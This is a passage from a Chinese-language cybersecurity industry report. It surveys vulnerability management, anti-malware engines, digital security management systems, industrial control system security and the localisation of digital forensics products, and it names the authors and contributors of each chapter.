集“漏洞监测、漏洞收集、漏洞挖掘、漏洞存储、漏洞运营管理、专家响应、 漏洞情报预警、安全服务定制化”于一体的漏洞安全一站式基建服务,通过 建立完善的漏洞处置机制、管理机制、响应机制,支撑国家关键信息基础设 施进行全方位的漏洞运营管理,提升整体安全能力建设。 (3)加强漏洞情报协同 将企业自身资产与智能推送引擎相结合,将自有漏洞情报追踪系统与大 数据分析及人工智能算法相结合,通过漏洞专家团队赋能,对情报数据进行 清洗、汇聚、补充,确保漏洞情报的精准可靠,验证便捷,全面提升风险感 知能力。 (4)建立个性化漏洞运营服务体系 通过在软件开发生命周期过程中提早引入安全检测工具,进行漏洞检测、 研判复现、风险分析、漏洞验证和漏洞修复优先级关联分析,保证漏洞修复 流程和漏洞关闭更高效,最终形成企业自身的漏洞知识库积累。从情报协同、 资产梳理、漏洞检测、风险评估、漏洞修复、漏洞验证、处置归档等方面, 以“人”为核心,建设一整套体系化、流程化、持续化的漏洞管理机制,实 现漏洞闭环的集中处置,提高漏洞管理的工作效率与漏洞响应处置速度。利 用历史数据构建行为监控基线,提升对潜伏性威胁、Oday 漏洞利用等关键安 全风险与事件的调查研判和取证效率。 本章主笔人员: 三六零数字安全科技集团有限公司胡晓娜、闫小涛、冯飞、王佳敏 本章贡献人员(按公司名称拼音排序): 安芯网盾(北京)科技有限公司师 一 帅 北京安普诺信息技术有限公司子芽、王雪松、张荣香 北京安全共识科技有限公司刘祥辉、邬迪、李雅 北京华云安信息技术有限公司李润泽 北京启明星辰信息安全技术有限公司蒋发群、张苗苗 北京神州绿盟科技有限公司负珊、许伟强、李瀛 北京天融信网络安全技术有限公司黄栋 北京云起无垠科技有限公司沈凯文、王书辉、夏营 北京长亭科技有限公司王兆蒙 北京众安天下科技有限公司张弛 杭州安恒信息技术股份有限公司袁明坤、俞斌、马翔宇 杭州孝道科技有限公司徐锋、刘永瑞、陈小赛 上海碳泽信息科技有限公司贾玉彬、董惠 20.反恶意代码引擎 反恶意代码引擎是恶意代码检测能力的发动机,已成为网络安全的基石 性能力。随着威胁形势的不断演进,攻击者对反恶意代码引擎进行更多的预 测和绕过,反恶意代码引擎面临着效能不断衰减的巨大挑战。面对新形势的 挑战,反恶意代码引擎需要持续自主创新、坚持关口前移,同时构建良性的 安全赋能生态,将安全能力延伸至威胁可达之处。 20.1国产反恶意代码引擎发挥了关键卡位作用 网络空间中,所有的执行体都有可能被恶意代码用作攻击载荷。无论怎 样的安全威胁都是基于能动性主体,通过直接或间接的方式,使用依托于硬 件、系统、平台和应用而运行的执行体,达成从静态载荷到动态指令执行, 再到实现攻击效果的过程。恶意代码载荷具备更丰富的信息内涵、更长的生 命周期,因此恶意代码从静态载荷到动态指令执行这个过程,是最有可能被 有效捕获和持续分析的阶段。通过分析恶意代码载荷可以有效揭示攻击手段、 使用的攻击资源、攻击技战术乃至背后的攻击组织、攻击者身份,更好地支 撑防御策略的制定。因此对于动作代码、恶意代码或者第三方工具的检测是 网空威胁预防、分析和对抗的重要支点。 反恶意代码引擎对保障国家网络安全和全球网络安全战略威慑具有非 常重要的作用。从地缘政治经济来看,各引擎厂商不可避免具有民族性、地 缘性。本土的反恶意代码引擎已经被应用于本国的重要基础设施以及相关防 御体系中,支撑整个国家的威胁防御能力。以美方为例,老牌反病毒企业 Mcafee已成为美军前台的军标反恶意代码引擎的供应者。各国都在使用自主 的反恶意代码引擎来保障本国的网络安全防御体系。俄罗斯使用 Kaspersky 和 Dr.Web、 德国使用Avira、 斯洛伐克使用Eset构建自己国家网络安全战略 中的关键卡位点,支撑其在网络空间的防御、分析和溯源以及外交层面的斗 争。我国采用国产独立自主的反恶意代码引擎构建自己的关键卡位点也将成 为必然趋势。 国内反恶意代码引擎供应商一直通过赋能自有产品或第三方安全产品 的方式为网络安全产业提供核心的威胁检测能力。截至目前,我国反恶意代 码引擎已为全球超过30亿部智能终端、超过5000万终端、超过130万台网 络设备和网络安全设备、超过50万云原生节点提供安全防护。反恶意代码 引擎也应用在物联网、车联网、工业互联网和5G 等新兴场景。在攻击时空 不断泛化的背景下,反恶意代码引擎应该在坚持关口前移的同时加强生态合 作,寻求构建良性安全生态。 20.2 反恶意代码引擎面临三方面的挑战 20.2.1 威胁数量和复杂度不断增加 基于安天赛博超脑威胁对抗工程体系数据统计,从2000到2020这20 年间,恶意代码变种数增加了近700倍。2022年前10个月,安天检测到了1.2 亿个恶意文件,其中新的恶意代码家族超过1700个,新变种超过了35万。同时, 在与网空威胁行为体的对抗过程中可以看到,攻击方使用的恶意代码趋向于 集成化和模块化,技战术越来越复杂,抗分析能力越来越强。恶意代码的运 行平台从早期的DOS、扩展到Windwos再到覆盖全平台,攻击对象涵盖了主机、 服务器、路由器、固件、虚拟化平台、Web 浏览器和各种应用程序等;代码 规模从早期的几十数百行提升到数十万行;网络通信从无加密通信到越多使 用加密通信;开发者从早期的个人或民间组织演变到有充足成本支持的规模 型、具有政经背景的组织;抗分析能力从易于分析演变到难以分析。 20.2.2 网络安全威胁正在向新场景加速泛化 随着网络和信息技术的发展,网络和信息场景已经从早期的大型机演变 到万物互联的场景:互联网终端、物联网终端、工业互联网终端、各种智能 传感器及万物链接在一起。物联网日益增长的可用性以及相对脆弱的安全性, 使恶意代码和各种安全威胁也逐渐蔓延到各种新兴场景中。 20.2.3反恶意代码引擎容易被获取、分析和测试 由于反恶意代码引擎一种易于获得的安全资源,有耐心的攻击者几乎可 以从互联网上公开获取到各个厂商的产品,然后对其进行不断的免杀测试, 直到所有引擎都无法检测,再进行投放攻击。同时,多引擎对照扫描工程体 系已经非常成熟,VirusTotal 上已经集成了全球几乎所有的反恶意代码引擎。 这为攻击者进行免杀测试提供了便利。另外,反恶意代码引擎需要赋能各类 安全产品和网络系统的防御体系才能发挥作用,这种应用模式也间接导致了 其被获取和测试的可能性。 20.3 国内厂商通过叠加式创新应对效能衰减 面对全新并不断变化的威胁形势,国内反恶意代码引擎供应商在多年积 累的能力基础上,进行了叠加式创新,研发了下一代反恶意代码引擎,在充 分发挥反恶意代码引擎能力价值的基础上,结合用户的高度赋能,打造攻击 者难以预测的安全能力,有效应对不断变化的威胁形势。 20.3.1 多维度的叠加式创新 在检测理念方面,传统的反恶意代码引擎对输入对象进行恶意和可信鉴 定,并输出检测结果。下一代反恶意代码引擎的立足点是,攻击方可以获得 引擎并验证绕过。在一系列有针对性的设计下,反恶意代码引擎的威胁对抗 能力(深度和不可预测性)大幅提升。 下一代反恶意代码引擎的总体思想是把反恶意代码引擎从一个单纯的完 成对输入对象完成实时检测的鉴定器,转化为识别、鉴定、拆解、分析和情 报承载器的复合安全能力载体。识别就是认为不存在“无毒格式”,对各种 格式进行识别和输出。拆解就是对恶意代码载荷进行预处理,包括解压缩、 脱壳、解密等,将检测对象“元数据化”。分析就是基于提取的多维度向量 和相应的威胁标签支撑上层分析。情报承载就是依托反恶意代码检测引擎承 载深度威胁情报。鉴定就是从传统反恶意代码引擎仅输出检测对象的恶意代 码名,提升到输出相应的威胁知识库(包括ATT&CK 威胁框架映射标签、 攻击组织等知识信息)。在输入对象方面,下一代反恶意代码引擎的检测对 象从文件扩展到主机场景向量和网络场景向量,使引擎有了更大的发挥空间 和场景化威胁判别能力。 20.3.2承载向量级威胁情报 在基础IOC( Indicator of compromise) 情报上有很多高价值的信息。这 些信息通常由引擎的深度拆解和人工分析结合生产,它们标识了攻击载荷的 本质信息和基因特性,具备高鲁棒性的检测能力。不过,虽然用户看得见这 些信息,但由于缺乏格式识别、深度解析、多维提取和分析等能力,往往难 以应用到自身的安全防御场景中,更不能切实转化为有效的安全能力。这需 要反恶意代码引擎提供相关能力,但是业界大多数引擎未开放引擎的深度拆 解能力,这导致了高价值信息看得见、摸不着、用不了。安天面向高级持续 性威胁活动和不断演进的威胁,提出了向量级威胁情报的概念:基于反恶意 代码引擎的识别和深度拆解能力承载,从执行体中抽取的能够表征威胁行为 体基因特性、具备形式化特征的深度情报。向量级威胁情报包括但不限于: 属性信息、结构信息、环境信息、编译信息、签名信息、通讯配置信息、关 键代码片段等。这些向量信息可关联到其可能对应的开发者、攻击意图、攻 击手法、攻击资源和攻击目标等。向量级威胁情报拥有更高鲁棒性的威胁检 测能力、更强的威胁揭示能力、可以充分发挥反恶意代码引擎的能力,支撑 更有效的威胁对抗。 20.3.3深度赋能用户 下一代反恶意代码引擎支持在用户侧进行私有化的部署,结合应用场景 建立向量级私有规则和向量级威胁情报的自生产、自消费和自运营。用户不 仅获得安全厂商的能力输出,还融合了在自身环境中观测的威胁以及第三方 分析报告中的高价值信息,最终通过工程化体系能力前置、反恶意代码能力 内生与向量级威胁情报结合以及客户赋能,达成攻击者难以预测的安全能力。 下一代反恶意代码引擎已经应用在终端安全防护、流量威胁检测与响应、沙 箱、应急取证、态势感知和威胁情报等多种安全产品里,并在多个重要安全 工程项目中获得应用。 本章主笔人员: 安天科技集团股份有限公司童志明、李石磊、韩耀光 21. 安全管控 安全管控体系是指以网络安全管控的信息化工作平台为抓手,以网络安 全管理体系、安全技术体系、安全运营体系、安全服务体系为支撑,形成的 综合管控体系。 21.1 现有的安全管控体系亟需创新发展 目前多数的安全管控体系仍然以“人”为核心,存在管理理念落后、缺 乏数字化技术支撑等问题。 21.1.1 传统的安全管控体系难以应对日益复杂的安全需求 为了应对不断出现的安全挑战,网络运营者部署了防火墙、入侵检测、 漏洞扫描、防病毒、终端安全等一系列的安全设备。这些安全设备工作在不 同层面,发挥不同作用,在构建纵深防御体系的同时又很容易形成“安全防 御孤岛”和“信息孤岛”。安全管理人员面对这些数量巨大、彼此割裂的安 全信息,操作着各种产品自身的控制台界面和告警窗口,很容易导致工作效 率降低,甚至安全保障能力下降。 另外,面向日趋严格的网络安全监管要求,网络运营者试图通过扩大运 营管理团队规模和购买安全服务等方式提高安全运营水平。然而,在没有安 全管控体系发挥统筹协调作用的情况下,即便投入再多的安全设备和人员, 购买再多的安全服务,也没有很好地解决问题,反而带来了更多的管理负担 和管理风险。 21.1.2 目前的安全管控体系存在三大问题 当前,各单位对网络安全工作的重视程度不断提高,但在安全管控方面 仍然存在一些隐患,如管理分散、数据不关联,管理不可见、不可控,人为 风险高、体系不健全等问题比较严重。 (1)安全管控体系化建设程度不高 安全技术与安全管理存在“两张皮”现象:监测、预警、防护、响应未 形成完整的工作闭环;各层级安全策略不统一,协同体制机制有短板和断点; 未形成资产、风险与管理制度、人员和流程的映射,导致安全管理规章制度 落实有盲区,有的安全风险和漏洞长期存在。 管控以人为核心的现象较为突出,缺乏技术保障措施。管控以人为核心, 依赖人的能力、责任心等,存在人为因素风险。 一是管控人员不尽责,购买 再多再好的安全产品也没有作用;二是管控人员不能及时完成相关安全防范 工作,埋下诸多安全风险;三是管控人员想窃取数据、搞破坏,几乎无法阻止。 管控体系缺乏技术保障措施,管控要求制度流程难落地。 一是管控工作缺乏 量化与评判依据,管控成效难度量,责任风险难避免;二是管控过程是黑匣子, 过程不可视,风险不可控,难以真正保障管控安全。 (2)安全能力“碎片化” 安全产品没有形成统一的安全监管策略,风险显示分散、各种安全设备 成为“防御孤岛”,抵御复杂网络安全威胁的效果大打折扣。主要体现在以 下三个方面: 一是补丁式建设、松散式管理,难以形成统一的安全管控体系, 主要表现在:资产不清家底不明,无法及时掌握设备系统运行管控情况;安 全设备是否发挥了作用,能否及时更新与有效配置策略并不明确;管理分工 不明确、责任不清,存在管理真空。二是碎片化安全管控形成运营管控数据 孤岛,难以跟踪与协同,主要表现在:难以数据共享、综合分析,多维度进 行问题分析研判;难以协同联动,建立过程管控,实现故障的准确定位与快 速排除;难以直接追踪呈现事件处置的过程与结果。三是缺乏数据支撑,数 据难以有效利用,主要表现在:面对几百上千条策略,哪些必须、哪些是临 时策略、哪些无效,是否存在错误配置,每条策略的作用是什么,如何优化 都不清晰;历史管控数据缺乏有效归档,难以利用历史数据准确分析、快速 处置。 (3)安全管控缺少可视化、数字化、自动化 构建“边界清晰、监管到位、安全可控、责任明确”的安全管控体系是 数字经济时代下网络安全管理的发展目标。然而当前仍然存在以下问题: 一 是安全管控系统运行状态、运行管理与服务过程的可视化程度不高,服务过 程无法掌控,无法保证每个服务过程的质量、效果以及整个服务的安全性; 二是未建立流程规范、智能化引擎与跟踪反馈等过程管理机制,服务缺乏数 据支撑,未形成整体联动,难以高效分析解决问题;三是人为管理的现状仍 普遍存在,流程规范标准等存在“纸上谈兵”的风险。 21.2 数字化安全管控体系是必然趋势 数字化安全管控体系,是指以“安全管控”为核心,以网络安全管控的 数字化中台建设为抓手,以数字化安全技术体系、数字化安全管理体系、数 字化安全服务体系、数字化安全运营体系为支撑,形成“资产、风险、事件、 人员、流程”等管理要素数字化、并有机融合的数字化综合安全管控信息系 统。 21.2.1 安全能力中台化将成为安全管控的基础 随着全面在线化、广泛的远程办公场景、在线会议等,安全运营要与IT 运营、内控、人力资源等完成更紧密的协作与融合,安全管控需要进行跨职 能部门的资源协调,需要能整合企业内各应用系统,支持与保障企业的数字 化战略。由于网络安全的基础性和泛在性,任何一个组织都无法独立应对网 络安全威胁,必然需要多层面的协调联动。这种多层次的协调联动,必然产 生安全能力标准化和互操作的要求。因此,安全能力中台将成为企业网络安 全的核心枢纽,以资源化、能力化、服务化、标准化的方式,打通组织内外 和职能边界,让安全管控数字化。 21.2.2 自动化响应将成为安全管控的必备能力 未来,安全产品和安全服务的联动将更加紧密。安全服务逐渐从配合产 品的辅助角色,转变为安全产品发挥最佳效用的必要条件。相应地,安全管 控也开始从传统的已知安全事件拦截,逐步演变成基于大数据和人工智能技 术的网络安全事件分析、态势预测、隐蔽安全事件溯源的综合型工作,成为 将技术、流程和人有机结合的系统工程。因此,自动化是安全管控体系中必 不可少的技术支持。新时代安全管控建设的目标是搭建一个适用的、良性的、 有效的、可扩展且具备安全事件自动响应的安全管控体系,通过安全运营确 保业务连续性以及信息系统抗风险能力,不仅解决传统安全所不能解决的问 题,而且让安全工作变得更方便、更有效率,提高整体安全管控的能力。 21.3 四个维度建设数字化安全管控体系 数字化安全管控体系的建设应当采取一体化建设、共享式发展的思路, 加强顶层设计,以安全大数据为基础,从安全管理组织、技术能力、运营服 务管理三方面进行整体设计,从全局视角提升对安全威胁的发现识别、理解 分析、响应处置能力。 21.3.1 建设数字化集中管控技术体系 一是通过技术、管理、服务的深度融合,建立统一运营管理策略;二是 从松散的碎片化管理向集中管控的体系化管理转变;三是建立统一管理、统 一监控、统一审计、综合分析、协同处置、安全运维的管理技术中台,摸清 家底,全面掌握系统运行与管理状态,实现全程管控,把分散的运行管理数 据集中汇聚;四是建立多维度关联关系,解决数据孤岛与协同联动的问题; 五是实现主动预防、实时监测、快速响应、处置跟踪的一体化管理技术闭环。 21.3.2 建设数字化管理体系 一是从以人为核心的粗放管理向数据驱动的精细化运营管理转变;二是 基于组织人员、制度流程的统一管理,构建管理策略、管理目录,编排管理 任务,任务驱动管理策略执行;三是建立管理体系数字化,组织分工明确、 责任到人,量化管理工作成效;四是与技术体系深度融合,实现任务执行跟踪, 保障制度策略落地,管理过程可视可控可追溯,保障管理安全。 21.3.3 建设数字化服务体系 一是基于服务商、人员、项目的统一管理,建立服务目录、服务标准与 流程规范,量化服务考核,保障服务质量;二是从事件驱动管理向事件与任 务双引擎驱动管理;三是运用安全可靠的服务机制、创新在线服务模式, 实时服务响应、共享专业技术资源,服务过程可视可控可追溯,保障服务 安全。 21.3.4 建设智能化运营体系 一是创新在线处置与在线服务,实现运营管理的全程管控与数据支撑; 二是建立计划任务、检查、绩效考核管理,建立知识库、培训、演练、指 挥管理,建立全面的运营分析与运营报告;三是运用机器学习、知识图谱, 推动智能分析、科学决策与智能应用,最终构建数字化安全管控智慧运营 管理大脑。 本章主笔人员: 南京联成科技发展股份有限公司凌飞、张弛 浙江远望信息股份有限公司陈旭、卢普明 本章贡献人员(按公司名称拼音排序): 北京启明星辰信息安全技术有限公司蒋发群、闫宏石、凌墨缘 北京神州绿盟科技有限公司陶智 广东安证计算机司法鉴定所胡海、赵延详 杭州安恒信息技术股份有限公司聂桂兵 杭州世平信息科技有限公司顾益宇 江苏云涌电子科技股份有限公司李新顺 科来网络技术股份有限公司许冰 中电长城网际系统应用有限公司刘鹏 22.工控安全 22.1 数字化时代工控安全加速发展 22.1.1 工控安全覆盖了全工业生产周期 受“震网病毒事件”的影响,早期的工控安全主要范围集中在从车间/ 工厂的设备层、控制层、监控层等的安全管理和安全技术的实施。2016年开 始,信息化与工业化融合不断深入,互联网技术(4G/5G 通信网络、边缘计算、 云计算、大数据、人工智能……等)在工业领域得到广泛应用,工业控制系 统的数字化、网络化、智能化趋势日益明显,工控安全的范围扩展到泛在的 工业互联网网络层和工业云平台等,工控安全也从最初的重视生产一线的设 备层和监控层,逐步演变为涵盖“人、机、料、法、环、测”全工业生产周期, 构建了以工业互联网云平台、工业互联网络和工业互联网安全三位一体的工 业互联网技术体系。由于工控系统的基础经济价值性,加之工控网络的开放 性日益增加,使得工控系统成为网络攻击者重要的攻击目标,工控网络安全 的重要性也日益凸显。 随着十四五“数字化中国”号角的吹响,更多的工业现场将更多的采用 数字化的手段,进一步提升我国在数字化经济时代的领导力。国家相关部门 积极推进工控安全工作,如《网络安全法》、 《数据安全法》、《关键信息 基础设施安全保护条例》等网络安全法律法规的落地施行,工控安全进入更 加广阔的技术空间和应用领域。 22.1.2 国家政策指引工控安全防护建设 2019年12月1 日发布的《网络安全等级保护2.0》系列标准,将工控 系统纳入了等级保护范围。工控网络安全进入有标准可供遵循、依据标准建 设、治理的阶段。在技术方面,等级保护指出的“一个中心,三重防护”为 工业安全防护三同步原则,提供了重要的方向和测评指引。 2019年12月,工信部组织编制了《工业互联网企业网络安全分类分级 指南(试行)》,该指南按企业所属行业网络安全影响程度、企业规模、企 业应用工业互联网的程度、企业发生网络安全事件的影响程度等要素进行分 级,在工业互联网联网企业的防护措施上延续了等保的思想,并在不同类别 的企业进行试点,以提升企业的整体网络安全防护能力。 2021 年,国务院正式颁布《关键信息基础设施安全保护条例》,其中 明确提出的能源、交通、水利、国防科技等重要行业和领域与原工控领域重合。 在此基础上,《信息安全技术关键信息基础设施安全保护要求》也正式发布, 将于2023 年 5 月 1 日正式施行。该标准将为我国更进一步开展关键工控领 域的安全工作提供有力保障。 另外,在工业数据安全领域方面,随着2021年《数据安全法》正式施行, 工业数据承载着工业产品全生命周期各个环节以及相关技术和应用,高效的 数据共享和利用能有效的促进工业企业的数字化转型。目前,相关部门正在 积极开展各领域的试点和成功案例推广,并以此为基础逐步形成工业数据分 类分级,数据安全评估、治理、建设、运营的最佳实践。 22.1.3 工控安全产品和技术方案日益完善 据统计,业内普遍采用的技术、研制的产品可大致分为以下几类: 第一类为内生/可信安全技术,如可信 PLC、 可信工业交换机、可信工业 SCADA 系统;第二类是安全终端类产品,如工控主机加载执行产品、主机 加固产品等;第三类为以白名单为基础的流量访问控制产品,如工业防火墙、 工业网闸、安全工业网关等产品;第四类为检测分析类产品,如工业入侵检 测产品、工业流量审计产品、日志审计类产品等;第五类为综合类管理产品, 如工控安全管理平台、工控态势感知产品、工控资产空间测绘等产品。经过 近几年的发展,产业内各供应商的上述产品普遍完成了国产化的适配工作。 在安全防护整体技术落地方案方面,国内工控安全整体技术方案走过了 网络隔离、网络纵深防御两个阶段,正处于探索完善工控安全主动防御体系 阶段。网络隔离阶段主要通过网关、网闸、单向隔离等设备实现工业控制网 络与互联网、办公网等其他网络的物理隔离。网络纵深防御主要通过多种防 护手段建立多层级、成体系的多级防线,综合使用防火墙、入侵检测等多种 安全技术形成整体防护能力,但这两种安全防护方案在面对复杂的高级持续 性威胁时,难以发挥作用。 工控安全主动防御体系主要应对高级持续性威胁和未知威胁免疫,常见 的分支技术体系有可信计算和可信网络、多模态主动安全防御、零信任防御 体系等,主动防御体系是下一代工业信息安全的主流技术发展方向。 22.2 工控安全面临供应链、新技术和人才三方面的风险 22.2.1 国产软硬件供应链面临挑战 由于历史原因,我国很多工业软硬件及系统过度倾向于采用进口产品, 导致自主工业产业发展迟缓。缺“芯”少“魂”的现象在工业领域同样存在, 特别是工业软件、高端制造、基础原料等领域出现大量被“卡脖子”的局面。 这些情况对工业设计、工业生产和工控安全都提出了很大的挑战。 在工业控制领域,完全面向工业生产制造环境的自主硬件产品还不成 熟。设备在现场苛刻环境里的稳定性和性能,是我们面临的一个很大挑战。 例如, 一些芯片和关键元器件,在工业宽温条件下不足以高质量工作,如工 业闪存、工业 CPU 等关键器件还比较短缺;在工业设计领域,工业设计软 件主要依赖于进口;在基础软件领域,缺乏高精度协同的工业协议和实时的 操作系统。 22.2.2技术快速发展引入安全风险 近年来,5G 、物联网、云计算、大数据、区块链和人工智能等新技术在 工业互联网中大量迭代应用,促进工业的自动化、信息化,以及最终达到数 字化。 一度非常封闭的工业生产环境也随着 OT(Operation Technology) 与 IT(Information Technology)的融合,引入了更多的安全威胁,其主要表现在: 一是原有OT 领域的漏洞并没有充分发现,且大多数工业现场不具备升级和 打补丁的条件,联网后使被利用的风险增加;二是数据的广泛流动,加剧可 用性和完整性的风险;三是APT 攻击针对性强、破坏性大,长期威胁工业 安全活动;四是企业"内鬼"更容易猖狂等。 从整个工业互联网数字化趋势来看,数字化转型成功必然需要完成IT 与 OT 的完全融合,而工业生产企业的重视安全生产运营远远高于网络安全, 这一特性极大地削弱了生产环境应对安全威胁的能力。因此,需要融合IT 与 OT 技术特性应用创新手段解决发展带来的新网络安全问题。 22.2.3 工控安全人才严重缺乏 2017年以来,我国开展了一系列工控安全的意识教育与人才培养工作, 为普及工控安全意识,提升工业信息安全知识技能,培养工业信息安全人才 队伍打下了扎实基础。但是,随着工业互联网、智能制造的蓬勃发展,产业 对于工控安全人才的需求发生了变化。原来的工控网络安全人才主要来源于 自动化和原网络安全人才的融合。随着工业数字化转型的推进,工控安全人 才还需要掌握生产制造、数字化仿真建模、工艺应用、虚拟现实等各数字化 交叉学科。由于工业安全市场相对分散和小众,服务于工控安全的人才供给 不足问题日益突出。 22.3 自主创新引领工控安全高质量发展 22.3.1 以关键信息基础设施安全保护为牵引,强化技术创新 党和国家高度重视关键信息基础设施安全。工控安全的完善需强化基础 科学领域创新,提升工业基础自我造血能力;强化供应链深度创新合作,建 立并不断完善供应链安全保障,引导技术创新。 (1)强化工控安全基础科学和基础应用创新 进一步梳理电子、工业设计软件、工业互联网平台、工业边缘等基础领 域的实际痛点问题,由关键技术点切入,从共性技术、底层基础、设备设施、 上层应用,对控制设备、控制网络、控制软件、设计能力形成工控安全领域 协同创新的闭环,促进工控行业的功能安全和信息安全提速发展。 鼓励科研机构、行业企业、安全研究人员等开展合规的工控安全漏洞挖 掘、验证、报送、修复等工作,进一步加强工控领域的漏洞管理生态,加大 漏洞发现,漏洞通报与漏洞生命周期管理机制。 建立工业安全情报系统,形成持续健全的漏洞库管理运营机制,及时信 息共享,筑牢应急处置能力。 (2)发挥龙头企业支撑带动作用,引领供应链协同创新 制定技术、管理、工作标准,形成供应链标准参考模型,以实现共同利 益最大化为目标的一体化运行机制,充分发挥标准体系在供应链领域的指导 作用。应用区块链、大数据、物联网等先进技术,加强开放交互式信息平台 建设,促进节点企业能力信息共享、状态信息共享、制造信息共享等。避免 技术、工艺变更欺诈等信任机制破坏行为,推动供应链各环节设施设备和信 息数据的高效对接,实现信息全链条覆盖。同时对全链条数据进行短期实时 动态监控和中长期运行条件监控,以数据为载体推动供应链的可视化,构建 信息追溯查询平台,实施数据的全生命周期管理,加强供应链协同管理,实 现内外高效协同。 22.3.2 以技术创新引领工控安全高质量发展 工控网络安全技术在多年发展的基础上,目前已建立起“白名单+访问 控制”技术为主产品和服务体系,较好的解决了现役工控系统的网络安全问 题,但数字化的兴起面临一系列新的挑战,亟待于发展融合的工控网络安全 创新技术解决面临的新问题。 (1)可信计算在工控安全领域的创新与应用 可信计算作为保障各类信息系统安全的底层基础安全技术,也可以广泛 应用于工控系统中,并和工控安全技术相结合,进一步提高工业控制系统安 全防御能力。在部分可信安全的试点方案中,通过实施可信保障的安全管理 中心,并形成安全计算环境、安全区域边界、安全通信网络三重防御多级可 信互联技术框架,达到主动免疫的防护效果。 (2)工控细分行业场景化的小步式技术创新 随着客户对网络安全认知的理解加强以及相关技术的成熟进步,用户已 不满足于仅仅合规建设,提出了适用于现场的需求,同时也促进了不同的工 业领域面向工控安全的不少小步技术创新。大概分为如下几类: 首先是特定技术使用场景的融合式创新。如国家电网按自身需求提出的 具备过程管控、网络通信代理、恶意代码检测、违规外联管控、高危指令管 控等多种安全功能的移动运维需求;在轨道交通领域,提出了能适应车机车 载环境运行的,能同时满足信号系统、列车控制系统、乘客系统网络安全的 创新性车载防护系统。 其次是网络安全和功能安全的融合式小步创新。如部分行业用户提出了 防止误操作和已有网络安全功能相结合的技术创新; 一些行业用户提出形成 工控网络安全和生产安全一张网,建立大数据安全处置运营系统的技术需求。 (3)先进技术迭代创新 IT 领域的技术更新迭代速度远远快于工控网络。常见如零信任技术思想 体系、5G+ 融合网络、大数据与人工智能等。 比如在工控领域,可以建立工业互联网、工业物联网等细分领域轻量级 的零信任技术解决方案,形成动态授权,动态策略,主动响应机制,进一步 系统性的加强工业网络主动安全防御能力。 在5G+ 工业联网安全服务领域,覆盖端、边、管、云的四个安全应用场景, 形成5G 泛终端内生安全能力感知、切片全流量安全检测、5G MEC 云安全 资源池、5G 安全编排与工控自动化运营能力的整体技术创新。 最后,随着工业数字化建设浪潮下工业网络互联互通,大数据、人工智 能技术在工控安全领域的应用有了可能,通过整合零散的工业安全大数据, 运用大数据安全分析模型和人工智能手段,深入挖掘安全风险与攻击事件, 可以建立工业网络安全横向威胁感知、AI 异常分析、追踪溯源等分析能力。 22.3.3 以工业网络靶场为抓手促进人才队伍建设 工业互联网安全人才除了需要掌握大量理论知识外,更需要注重实践动 手能力。因此,工业互联网全方面的攻防研究、测试与实训演练等实验、演 练场景对相关人才的培养十分重要。工业网络靶场通过搭建工业互联网安全 教学实训平台,实现理论教学与实训教学相结合。基于工业网络靶场,可开 展不同知识梯度的安全教学,定制生成工业互联网各种学习、实训、实践任务, 能有效满足工业互联网行业人才培养的不同特色需求,促进相关领域产学研 的落地。面对工控安全人才极度匮乏的现状,工业网络靶场将在人才教育培 训方面发挥着愈来愈重要的作用。 本章主笔人员: 长扬科技(北京)股份有限公司汪义舟、张亚京、赵华 本章贡献人员(按公司名称拼音排序): 安天科技集团股份有限公司王乃青 北京惠而特科技有限公司赵承刚 北京可信华泰信息技术有限公司郑锟、杜君 北京珞安科技有限责任公司肖智中 北京启明星辰信息安全技术有限公司蒋发群 北京天地和兴科技有限公司覃汐赫、胡心恬 北京天融信网络安全技术有限公司刘超、金忠龙、袁留记 北京亚控科技发展有限公司陈友越 杭州安恒信息技术股份有限公司周士敦、刘畅 江苏云涌电子科技股份有限公司方艳湘、黄婉静 科来网络技术股份有限公司何谷、金一 上海算石科技有限公司黄坚会 物迪网(上海)科技有限公司乔海峰、李如前 中电智能科技有限公司陈璐 23.电子数据取证 近年来,随着国际形势的发展,国外对国内电子数据取证产品的封锁日 益加强,美国的老牌取证产品Encase 、 以色列的手机取证产品Cellebrite 等 都已经先后对中国禁售。我国电子数据取证领域的主要厂商已经在电子数据 取证产品国产化道路上迈出了第一步,与国内其他国产化硬件、国产化操作 系统厂商建立合作,开展国产化技术攻关,形成了一些电子数据取证产品的 国产化替代解决方案。从市场来看,随着信息技术相关的软硬件产品的国产 化和国家对政府用电子设备国产化要求的提高,电子数据取证产品将有很好 的市场前景,电子数据取证领域的国产化市场仍然有很大的潜力等待发掘。 23.1 电子数据取证产业开始国产化道路探索 电子数据取证产品主要由软件部分和硬件部分组成。在电子数据取证 软件方面,主要包括面向电脑主机的硬盘和外部存储介质的取证软件、面向 Web站点和网页内容的取证软件以及专门针对智能移动终端的取证软件等。 目前国内各厂商的电子数据取证软件的主要功能均为自主研发,但大部分产 品仍然仅支持在 Windows/Linux 平台运行,并未对国产操作系统平台进行适 配,软件开发所使用的中间件、数据库等一般也是常见的国外开源解决方案。 同时,为了保证取证产品能够覆盖更多的场景,在软件中可能会集成一些非 自主研发的小工具,厂商加入这些工具一般是为了免去重复“造轮子”的时间, 利用被技术人员认可的、成熟的解决方案,解决取证过程中遇到的各类问题。 在硬件方面,电子数据取证产品的硬件形态一般是搭载了各类接口的塔式机、 便携机、服务器等。由于取证工作的时效性和对产品性能的要求比较高,大 部分厂商和产品选择的仍然是Intel 体系的整机硬件作为搭载电子数据取证 软件的通用平台,仅在定制化场景下为客户单独定制国产化整机设备。国内 芯片的适配还需要等国产芯片处理速度提升后才有望用在取证产品上。 目前,部分电子数据取证厂商已经响应“十四五”战略规划对自主创新 的要求,开始进行国产化电子数据取证产品的研发和部署,推出了适配国产 操作系统的全面自主化的取证产品,主要包含介质取证、密码分析、大数据 分析等产品种类。同时,各厂商将产品功能与国内社会热点和一线办案场景 深度融合,在新型网络犯罪取证、物联网取证、区块链取证、智能汽车取证 等新的取证方向持续完善取证产品,使产品能够更加贴合执法部门的使用需 求。电子取证设备国产化后,不仅可以实现电子取证技术独立可控,并且可 以避免机密案件数据通过非国产化黑盒产品被传输到外部,执法部门可与电 子取证厂商加强交流合作,从一线办案实际出发,从中总结出电子取证产品 的国产化需求,研发生产出更多符合部门需求的差异化电子取证设备及方案, 迅速提高电子取证自主创新的实力。 23.2 电子数据取证产品适配国产化软硬件进程动力不足 在技术方面,国产化软硬件与取证产品的适配还存在技术难点需要攻关, 如手机取证产品需要将不同品牌型号的手机通过数据线连接至取证设备后与 手机交互实现取证,此过程中可能还需要借助手机助手、itunes 等与手机配套 的工具,但目前在国产操作系统环境下常常遇到兼容性问题,以至于无法获 取到需要的电子证据。这些技术的突破需要有人力物力和财力的支持。从国 